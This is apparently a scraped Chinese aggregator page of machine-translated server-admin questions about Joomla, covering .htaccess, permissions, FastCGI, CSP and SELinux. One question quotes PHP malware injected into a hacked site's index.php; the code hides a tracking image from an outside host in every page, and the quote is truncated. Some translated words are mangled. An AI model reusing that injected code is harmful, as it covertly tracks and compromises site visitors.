服务器 Gind.cn

Articles of joomla

.htaccess拒绝访问大多数XML文件

我最近有一个Joomla网站被黑客攻击,所以我试图强化这个网站。 推荐的.htaccess中有一部分限制了对扩展名附带的xml文件的外部访问。 但是,它也让我的sitemap.xml文件被访问。 如何在保留其余的情况下允许某个文件? 这是默认的代码: <Files ~ "\.xml$"> Order allow,deny Deny from all Satisfy all </Files> 和我的修改,导致500错误: <Files ~ "(?!sitemap)\.xml$"> Order allow,deny Deny from all Satisfy all </Files>

.htaccess否认所有不起作用?

我在Ubuntu 11.04 Web服务器上运行Apache 2.2.20。 我有一个运行的Joomla网站,但我也添加了一些自定义内容。 在主网上直接我添加了一个文件夹/images/sub_folder ,在这个sub_folder我放了一大堆的图片。 我不希望任何人能够直接从networking上直接访问这些图片,所以我在该子文件夹中sub_folder了一个.htaccess文件,并在其中放入以下行: deny from all 似乎没有任何效果,我仍然可以直接从网页浏览器访问图像。 我重新启动了Apache服务。 我究竟做错了什么? 谢谢 蒂姆

帮助移动Joomla 1.5到一个新的Dir

我有一个joomla安装,将采取“生活”。 目前在www.markonsolutions.com/joomla 但是我想把它移到根目录或者像www.markonsolutions.com/m/这样的东西(为了把事情组织起来,并把i​​ndex.htmlredirect到目录) 我编辑了joomla文件夹的根目录下的configuration.php以反映www.markonsolutions.com/m,然后我将该目录重命名为M,我可以看到前页的文本,但是它不会加载任何图片和所有链接链接回/ joomla目录 关于接下来要尝试的任何想法 谢谢 抢

发现谁攻击我的网站

可能重复: 我的服务器被黑了应急 所有的Joomla! 在我的单个服务器上托pipe的站点被黑客攻击,并将以下代码注入到许多目录的index.php文件中。 <?php //{{126104ed GLOBAL $alreadyxxx; if($alreadyxxx != 1) { $alreadyxxx = 1; $olderrxxx=error_reporting(0); function outputxxx_callback($str) { $links = '<SPAN STYLE="font-style: normal; visibility: hidden; position: absolute; left: 0px; top: 0px;"><div id="af4dae82ae67843a194c001162"><img width=0 height=0 src="http://airschk.com/countbk.gif?id=4dae82ae67843a194c001162&p=1&a=%91P%BC%BCQ%F7%20%7C6%BE%0A8%F52%9C%F5nT%82%8A%C8V%27%A1%1E%85%1B%16%DBh%F2%A3U%10%9Dh%9C%FF%B6t%0F%B2%E9%18"></div></SPAN>'; preg_match("|</body>|si",$str,$arr); return str_replace($arr[0],$links.$arr[0],$str); } function StrToNum($Str, $Check, $Magic) { $Int32Unit = 4294967296; $length = strlen($Str); for ($i = 0; […]

如何在特定的时间范围内审核Linux文件系统中已更改或添加的文件?

我们是一个网站devise/托pipe公司运行几个网站,有人能够写入任意数据的文件系统。 我们怀疑他们仍然安装了一些脚本,并且需要一种方法来审计在过去10天内更改或添加的任何内容。 有没有我们可以运行的命令或脚本来做到这一点?

在Windows Server 2008上使用IIS 7.0安装Joomla

我一直在尝试在运行Windows Server 2008的服务器上安装Joomla。我已经成功地安装了PHP(使用Microsoft的web工具来安装PHP和IIS)和MySQL,现在正在尝试运行基于浏览器的安装。 一切都呈现绿色,我填写有关网站名称,MySQL信息等的适当信息,并没有发生错误。 但是,当我到达要求我删除安装目录的步骤时,我无法这样做,因为Windows声明它正在被另一个程序使用(我无法理解这是如此)。 此外,没有configuration.php文件创build,所以如果我设法删除这个文件夹我有一种感觉,会有问题。 我以为有某种权限问题,并设置IIS_IUSRS的权限,以读取,写入和执行权限的整个文件夹,Joomla所在,但这并没有帮助。 在这个问题上的任何帮助,不胜感激。 ;) 格雷格 编辑:我决定尝试手动安装Joomla手动编辑configuration.php文件。 这很好,现在我确定有一些权限问题正在进行,因为我能够做所有涉及到MySQL数据库(创build一个文章,编辑菜单项等)的任何事情,但任何涉及到更改到Joomla安装的目录不起作用(安装插件,使用Joomla中的全局configuration菜单编辑configuration设置等)我已经授予IIS_IUSRS每个权限,除了完全控制(阅读在Joomla!论坛上显示,这应该是足够的一切工作)。 这令我感到困惑,而且我很困扰这个问题。 编辑2:奇怪的是,在目录权限下的系统信息,一切都变成可写,但每当我尝试实际使用Joomla,例如,使用接口编辑configuration.php文件,它说它是无法编辑文件。

将服务器API从CGI更改为FastCGI

我有一个在CentOS上设置的服务器,我需要将API从CGI更改为FCGI(其他人最初设置)以使x-cache正常工作(我们需要这样做,因为我们周一有电视机出现,加载)。 该服务器是专用的戴尔R210,采用英特尔至强L3426(8M高速caching1.86GHz)和2GB内存 – 但是它支持244个并发客户端(通过loadimpact.com)。 计划是安装nginx作为apache的反向代理,并configurationapache监听端口81 localhost,并将nginx转发请求转发给apache。 目前什么是杀死我们的处理器是php渲染,因为我们运行的是Joomla 1.5,所以我想运行x-cache作为RAM的操作码。 但是x-cache不能和CGI一起工作 – 只有FCGI才能解决这个问题,为什么需要这样做? 这是一个安全的Joomla网站的变化? 这怎么可以通过CLI来完成 – 我们有cPanel,但我讨厌它。

完成加载网站后,隐藏EV SSL证书的原因是什么?

我正面临一个扩展validationSSL证书的问题,该证书在除DocumentRoot的索引之外的所有页面上都正确显示(带有组织名称和国家代码的绿色条)。 Web服务器上的权限和指令对于所有站点都是相同的,但出于某种奇怪的原因,EV栏显示几乎一秒钟,然后隐藏。 它保持服务器和浏览器之间的通信encryption,但地址栏显示为1级SSL证书,而不是EV(3级) 在firefox / chrome / IE上也是这样。 我使用的是Apache / 2.2.16(Debian)和libssl0.9.8,主站点在Joomla 1.5 CMS(我知道这很旧)。 我已经更改为1 joomla的configuration.php文件的force_ssl值,但结果是相同的,因为它不是一个encryption问题。

内容安全策略是否与Joomla的pipe理页面不兼容?

我想为在Apache 2.4上运行的Joomla网站设置一个内容安全策略头。 在h5bp中使用这个configuration并设置Header set Content-Security-Policy "script-src 'self'; object-src 'self'" src'self Header set Content-Security-Policy "script-src 'self'; object-src 'self'" src'self Header set Content-Security-Policy "script-src 'self'; object-src 'self'"为我提供了一个空白页面,用于loginwww.example.com/administrator/的Joomlalogin页面。 我怎样才能使用这个政策,并仍然login? 检查控制台,错误消息是: 内容安全策略:该页面的设置阻止了自我加载资源(“script-src http://www.example.com ”)。 pipe理员页面完全由example.com提供,没有第三方内容。 除了策略设置的login页面上的空白页面之外,该网站完美地工作。 检查/pipe理员页面的源代码,它看起来是完全普通的,除了JS没有运行。 完整页面源的副本在这里 。 因为我将example.com列入了“script-src'self'; object-src'self'”我希望这个页面可以呈现,但我明显错过了一些东西。 我现在重新testing了一个新的VPS和没有定制的Joomla干净安装。 设置内容安全策略并重新启动Apache会立即重现问题 – 浏览器中出现伴随控制台错误的完全空白pipe理页面,抱怨阻止资源加载的策略。 改变"script-src 'self' src'self "script-src 'IP:AD:DR:ESS' src'example.com "script-src 'example.com'或"script-src 'IP:AD:DR:ESS' src'IP "script-src 'IP:AD:DR:ESS'不会帮助,所有的脚本都会被封锁。 任何想法如何得到这个工作或进一步排除故障?

SELinux:如何启用写入访问Joomlacaching目录?

我已经在运行Joomla网站的Debian挤压系统上build立了SELinux。 Joomla PHP代码希望对某些caching目录有写权限。 / var / log / messages文件包含这些条目: Dec 31 10:26:16 s0022 kernel: [ 2116.423199] type=1400 audit(1356945976.634:14831): avc: denied { write } for pid=1886 comm="apache2" name="_system" dev=xvda3 ino=790893 scontext=system_u:system_r:httpd_t:s0 tcontext=unconfined_u:object_r:httpd_t:s0 tclass=dir Dec 31 10:26:16 s0022 kernel: [ 2116.447613] type=1400 audit(1356945976.658:14837): avc: denied { write } for pid=1886 comm="apache2" name="mod_mainmenu" dev=xvda3 ino=791346 scontext=system_u:system_r:httpd_t:s0 tcontext=unconfined_u:object_r:httpd_t:s0 tclass=dir […]
Intereting Posts
Rackspace Cloud站点上的相对path符号链接是否可靠? 如何使用带有身份validation的Nginx使用用户目录 为什么我的服务器在LVM内移动root fs后无法启动? 思科ASA 5505许可 Apache 2.2 / PHP不加载正确的php.ini 按子域分开证书(多个IP) pfSense设置build议 缓冲区限制为nginx? 我如何有一个Windows组自动映射连接驱动器? 在centos6.6上升级php到5.4.38后,“PEAR package PHP_Archive not installed” 根据请求头添加haproxy响应头 debug1:期待SSH2_MSG_KEX_DH_GEX_GROUP networkingpath被Windows服务locking 将我们自己的IP范围分配给Amazon Web Services上的服务器/负载均衡器? 增加NIC环形缓冲区的内存影响是什么?